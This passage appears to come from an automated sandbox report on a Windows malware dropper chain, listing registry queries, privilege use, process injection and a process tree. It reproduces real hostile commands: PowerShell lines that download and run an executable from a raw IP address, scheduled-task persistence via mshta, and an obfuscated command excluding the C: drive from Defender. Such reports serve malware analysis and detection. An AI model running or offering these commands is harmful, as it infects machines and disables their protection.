\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mAtJWNv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString sqVWjvh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 sqVWjvh.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1444 timeout.exe 7628 timeout.exe -
Enumerates system info in registry 2 TTPs 18 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer packed.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer PQkVDtx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 379 Go-http-client/1.1 -
Kills process with taskkill 5 IoCs
pid Process 6424 taskkill.exe 6384 taskkill.exe 2780 taskkill.exe 6580 taskkill.exe 5516 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133858437226520077" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\9E99A48A9960B14926BB7F3B02E22DA2B0AB7280 COM Surrogate.exe Set value (data) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\9E99A48A9960B14926BB7F3B02E22DA2B0AB7280\Blob = 0300000001000000140000009e99a48a9960b14926bb7f3b02e22da2b0ab72801400000001000000140000009c5f00dfaa01d7302b3888a2b86d4a9cf2119183040000000100000010000000c6150925cfea5941ddc7ff2a0a5066920f00000001000000200000008408d5e5010ab8da67eb33a7d79ace944dd0ac103ae6ead3ff30dec571066b0319000000010000001000000014d4b19434670e6dc091d154abb20edc5c000000010000000400000000080000180000000100000010000000fd960962ac6938e0d4b0769aa1a64e26200000000100000079040000308204753082035da003020102020900a70e4a4c3482b77f300d06092a864886f70d01010b05003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3039303930323030303030305a170d3334303632383137333931365a308198310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e313b303906035504031332537461726669656c6420536572766963657320526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100d50c3ac42af94ee2f5be19975f8e8853b11f3fcbcf9f20136d293ac80f7d3cf76b763863d93660a89b5e5c0080b22f597ff687f9254386e7691b529a90e171e3d82d0d4e6ff6c849d9b6f31a56ae2bb67414ebcffb26e31aba1d962e6a3b5894894756ff25a093705383da847414c3679e04683adf8e405a1d4a4ecf43913be756d60070cb52ee7b7dae3ae7bc31f945f6c260cf1359022b80cc3447dfb9de90656d02cf2c91a6a6e7de8518497c664ea33a6da9b5ee342eba0d03b833df47ebb16b8d25d99bce81d1454632967087de020e494385b66c73bb64ea6141acc9d454df872fc722b226cc9f5954689ffcbe2a2fc4551c75406017850255398b7f050203010001a381f03081ed300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604149c5f00dfaa01d7302b3888a2b86d4a9cf2119183301f0603551d23041830168014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7304f06082b0601050507010104433041301c06082b060105050730018610687474703a2f2f6f2e7373322e75732f302106082b060105050730028615687474703a2f2f782e7373322e75732f782e63657230260603551d1f041f301d301ba019a0178615687474703a2f2f732e7373322e75732f722e63726c30110603551d20040a300830060604551d2000300d06092a864886f70d01010b05000382010100231de38a57ca7de917794cf11e55fdcc536e3e470fdfc655f2b20436ed801f53c45d34286bbec755fc67eacb3f7f90b233cd1b58108202f8f82ff51360d405cef18108c1dda775974f18b96ddef7939108ba7e402cedc1eabb769e3306771d0d087f53dd1b64ab8227f169d54d5eaef4a1c375a758442df23c7098acba69b695777f0f315e2cfca0873a4769f0795ff41454a4955e1178126027ce9fc277ff2353775dbaffea59e7dbcfaf9296ef249a35107a9c91c60e7d99f63f19dff57254e115a907597b83bf522e468cb20064761c48d3d879e86e56ccae2c0390d7193899e4ca09195bff0796b0a87f3449df56a9f7b05fed33ed8c47b730035df4038c COM Surrogate.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_9wekyb3a8bbwe\dat\XboxSpeechToTextOverlay.exe:92 COM Surrogate.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3068 schtasks.exe 3020 schtasks.exe 5532 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1680 random.exe 1680 random.exe 4924 rapes.exe 4924 rapes.exe 4168 powershell.exe 4168 powershell.exe 4168 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 1608 TempYSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE 1608 TempYSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE 2732 powershell.exe 2732 powershell.exe 2732 powershell.exe 2492 rapes.exe 2492 rapes.exe 4128 powershell.exe 4128 powershell.exe 4128 powershell.exe 4696 powershell.exe 4696 powershell.exe 4696 powershell.exe 212 mIrI3a9.exe 212 mIrI3a9.exe 4488 powershell.exe 4488 powershell.exe 4488 powershell.exe 712 483d2fa8a0d53818306efeb32d3.exe 712 483d2fa8a0d53818306efeb32d3.exe 2632 sqVWjvh.exe 2632 sqVWjvh.exe 2568 17df09620c.exe 2568 17df09620c.exe 2632 sqVWjvh.exe 2632 sqVWjvh.exe 2220 chrome.exe 2220 chrome.exe 5488 8323f7acef.exe 5488 8323f7acef.exe 2632 sqVWjvh.exe 2632 sqVWjvh.exe 2632 sqVWjvh.exe 2632 sqVWjvh.exe 6008 787a5f5ef6.exe 6008 787a5f5ef6.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5372 msedge.exe 5372 msedge.exe 5976 msedge.exe 5976 msedge.exe 2632 sqVWjvh.exe 2632 sqVWjvh.exe 6116 3bd8e48c7d.exe 6116 3bd8e48c7d.exe 6116 3bd8e48c7d.exe 6116 3bd8e48c7d.exe 7768 ec6d990530.exe 7768 ec6d990530.exe 7768 ec6d990530.exe 7768 ec6d990530.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4840 SplashWin.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
pid Process 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 8120 chrome.exe 8120 chrome.exe 8120 chrome.exe 8120 chrome.exe 3052 msedge.exe 3052 msedge.exe 3052 msedge.exe 3052 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4168 powershell.exe Token: SeDebugPrivilege 3504 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 4128 powershell.exe Token: SeDebugPrivilege 4696 powershell.exe Token: SeDebugPrivilege 212 mIrI3a9.exe Token: SeDebugPrivilege 4488 powershell.exe Token: SeShutdownPrivilege 2220 chrome.exe Token: SeCreatePagefilePrivilege 2220 chrome.exe Token: SeShutdownPrivilege 2220 chrome.exe Token: SeCreatePagefilePrivilege 2220 chrome.exe Token: SeShutdownPrivilege 2220 chrome.exe Token: SeCreatePagefilePrivilege 2220 chrome.exe Token: SeShutdownPrivilege 2220 chrome.exe Token: SeCreatePagefilePrivilege 2220 chrome.exe Token: SeShutdownPrivilege 2220 chrome.exe Token: SeCreatePagefilePrivilege 2220 chrome.exe Token: SeShutdownPrivilege 2220 chrome.exe Token: SeCreatePagefilePrivilege 2220 chrome.exe Token: SeShutdownPrivilege 2220 chrome.exe Token: SeCreatePagefilePrivilege 2220 chrome.exe Token: SeDebugPrivilege 4816 a.exe Token: SeDebugPrivilege 6424 taskkill.exe Token: SeDebugPrivilege 6384 taskkill.exe Token: SeDebugPrivilege 2780 taskkill.exe Token: SeDebugPrivilege 6580 taskkill.exe Token: SeDebugPrivilege 5516 taskkill.exe Token: SeDebugPrivilege 6400 firefox.exe Token: SeDebugPrivilege 6400 firefox.exe Token: SeDebugPrivilege 2468 4135398cf6.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeDebugPrivilege 7360 powershell.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeDebugPrivilege 2492 powershell.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeDebugPrivilege 216 powershell.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeShutdownPrivilege 8120 chrome.exe Token: SeCreatePagefilePrivilege 8120 chrome.exe Token: SeShutdownPrivilege 8120 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1680 random.exe 2736 7b5aced374.exe 2736 7b5aced374.exe 2736 7b5aced374.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 5976 msedge.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6400 firefox.exe -
Suspicious use of SendNotifyMessage 35 IoCs
pid Process 2736 7b5aced374.exe 2736 7b5aced374.exe 2736 7b5aced374.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6400 firefox.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe 6460 ae85dec50f.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 6400 firefox.exe 5192 HmngBpR.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1680 wrote to memory of 4924 1680 random.exe 90 PID 1680 wrote to memory of 4924 1680 random.exe 90 PID 1680 wrote to memory of 4924 1680 random.exe 90 PID 4924 wrote to memory of 2736 4924 rapes.exe 96 PID 4924 wrote to memory of 2736 4924 rapes.exe 96 PID 4924 wrote to memory of 2736 4924 rapes.exe 96 PID 2736 wrote to memory of 3616 2736 7b5aced374.exe 97 PID 2736 wrote to memory of 3616 2736 7b5aced374.exe 97 PID 2736 wrote to memory of 3616 2736 7b5aced374.exe 97 PID 2736 wrote to memory of 3180 2736 7b5aced374.exe 98 PID 2736 wrote to memory of 3180 2736 7b5aced374.exe 98 PID 2736 wrote to memory of 3180 2736 7b5aced374.exe 98 PID 3616 wrote to memory of 3068 3616 cmd.exe 100 PID 3616 wrote to memory of 3068 3616 cmd.exe 100 PID 3616 wrote to memory of 3068 3616 cmd.exe 100 PID 3180 wrote to memory of 4168 3180 mshta.exe 101 PID 3180 wrote to memory of 4168 3180 mshta.exe 101 PID 3180 wrote to memory of 4168 3180 mshta.exe 101 PID 4924 wrote to memory of 3808 4924 rapes.exe 105 PID 4924 wrote to memory of 3808 4924 rapes.exe 105 PID 4924 wrote to memory of 3808 4924 rapes.exe 105 PID 3808 wrote to memory of 1444 3808 cmd.exe 107 PID 3808 wrote to memory of 1444 3808 cmd.exe 107 PID 3808 wrote to memory of 1444 3808 cmd.exe 107 PID 3808 wrote to memory of 2452 3808 cmd.exe 108 PID 3808 wrote to memory of 2452 3808 cmd.exe 108 PID 3808 wrote to memory of 2452 3808 cmd.exe 108 PID 2452 wrote to memory of 3504 2452 cmd.exe 109 PID 2452 wrote to memory of 3504 2452 cmd.exe 109 PID 2452 wrote to memory of 3504 2452 cmd.exe 109 PID 4168 wrote to memory of 1608 4168 powershell.exe 110 PID 4168 wrote to memory of 1608 4168 powershell.exe 110 PID 4168 wrote to memory of 1608 4168 powershell.exe 110 PID 3808 wrote to memory of 2660 3808 cmd.exe 111 PID 3808 wrote to memory of 2660 3808 cmd.exe 111 PID 3808 wrote to memory of 2660 3808 cmd.exe 111 PID 2660 wrote to memory of 2732 2660 cmd.exe 112 PID 2660 wrote to memory of 2732 2660 cmd.exe 112 PID 2660 wrote to memory of 2732 2660 cmd.exe 112 PID 4924 wrote to memory of 4708 4924 rapes.exe 114 PID 4924 wrote to memory of 4708 4924 rapes.exe 114 PID 4924 wrote to memory of 4708 4924 rapes.exe 114 PID 3808 wrote to memory of 3040 3808 cmd.exe 115 PID 3808 wrote to memory of 3040 3808 cmd.exe 115 PID 3808 wrote to memory of 3040 3808 cmd.exe 115 PID 4708 wrote to memory of 2644 4708 lk7ybIi.exe 117 PID 4708 wrote to memory of 2644 4708 lk7ybIi.exe 117 PID 4708 wrote to memory of 2644 4708 lk7ybIi.exe 117 PID 3040 wrote to memory of 4128 3040 cmd.exe 116 PID 3040 wrote to memory of 4128 3040 cmd.exe 116 PID 3040 wrote to memory of 4128 3040 cmd.exe 116 PID 4708 wrote to memory of 5088 4708 lk7ybIi.exe 118 PID 4708 wrote to memory of 5088 4708 lk7ybIi.exe 118 PID 4708 wrote to memory of 5088 4708 lk7ybIi.exe 118 PID 4708 wrote to memory of 5088 4708 lk7ybIi.exe 118 PID 4708 wrote to memory of 5088 4708 lk7ybIi.exe 118 PID 4708 wrote to memory of 5088 4708 lk7ybIi.exe 118 PID 4708 wrote to memory of 5088 4708 lk7ybIi.exe 118 PID 4708 wrote to memory of 5088 4708 lk7ybIi.exe 118 PID 4708 wrote to memory of 5088 4708 lk7ybIi.exe 118 PID 3808 wrote to memory of 3020 3808 cmd.exe 122 PID 3808 wrote to memory of 3020 3808 cmd.exe 122 PID 3808 wrote to memory of 3020 3808 cmd.exe 122 PID 3808 wrote to memory of 1548 3808 cmd.exe 123 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Users\Admin\AppData\Local\Temp\10126980101\7b5aced374.exe"C:\Users\Admin\AppData\Local\Temp\10126980101\7b5aced374.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn ThZvQmatz36 /tr "mshta C:\Users\Admin\AppData\Local\Temp\FTdycmLXZ.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn ThZvQmatz36 /tr "mshta C:\Users\Admin\AppData\Local\Temp\FTdycmLXZ.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3068
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\FTdycmLXZ.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Users\Admin\AppData\Local\TempYSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE"C:\Users\Admin\AppData\Local\TempYSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1608
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10126990121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "R1wF4mamR8J" /tr "mshta \"C:\Temp\Grin1EP4b.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3020
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\Grin1EP4b.hta"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4696 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:712
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"4⤵
- Executes dropped EXE
PID:2644
-
-
C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 7964⤵
- Program crash
PID:3476
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe"C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe"3⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:212 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
C:\Users\Admin\AppData\Roaming\a.exe"C:\Users\Admin\AppData\Roaming\a.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe"C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2632 -
